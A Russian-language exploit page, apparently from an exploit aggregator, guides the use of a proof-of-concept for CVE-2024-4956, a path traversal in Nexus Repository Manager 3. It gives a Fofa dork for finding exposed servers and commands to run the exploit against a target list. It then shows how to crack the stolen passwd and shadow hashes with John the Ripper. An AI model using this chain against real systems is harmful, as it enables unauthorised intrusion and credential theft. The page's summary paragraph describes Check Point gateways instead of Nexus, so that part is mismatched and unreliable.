## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VERYLAZYTECH-CVE-2024-4956
# CVE-2024-4956
   
# POC - CVE-2024–4956 - Nexus Repository Manager 3 Неавторизованный обход пути
Потенциально позволяет злоумышленнику читать определенную информацию на шлюзах безопасности Check Point после подключения к Интернету и включения Remote Access VPN или Mobile Access Software Blades. Доступно исправление безопасности, устраняющее эту уязвимость.
**Читать о нем** — CVE-2024-4956
> **Отказ от ответственности** : Данное доказательство концепции (POC) предназначено только для образовательных и этических целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчики не несут никакой ответственности за любое неправильное использование или ущерб, причиненный этой программой.
## Начало работы
### Поиск целей
Чтобы найти потенциальные цели, используйте Fofa (аналогично Shodan.io):
* **Fofa Dork** : `header="Server: Nexus/3.53.0-01 (OSS)"`

Сначала клонируйте репозиторий:
root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-4956
Затем выберите цель и добавьте ее в файл list.txt в этом формате:
* https://ip_address
Запустите эксплойт:
root@kitploit:~
python3 CVE-2024-4956.py -l list.txt
Результат — найденные файлы passwd и shadow:

Теперь, после того как вы нашли оба файла passwd и shadow, вы можете попробовать взломать хэш с помощью JohnTheRipper. После запуска эксплойта у вас есть 2 файла: passwd и shadow, поэтому вы можете объединить их в один файл и попробовать взломать (я использовал rockyou.txt, но это может быть любой список паролей):
root@kitploit:~
unshadow passwd shadow > unshadowed.txt
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt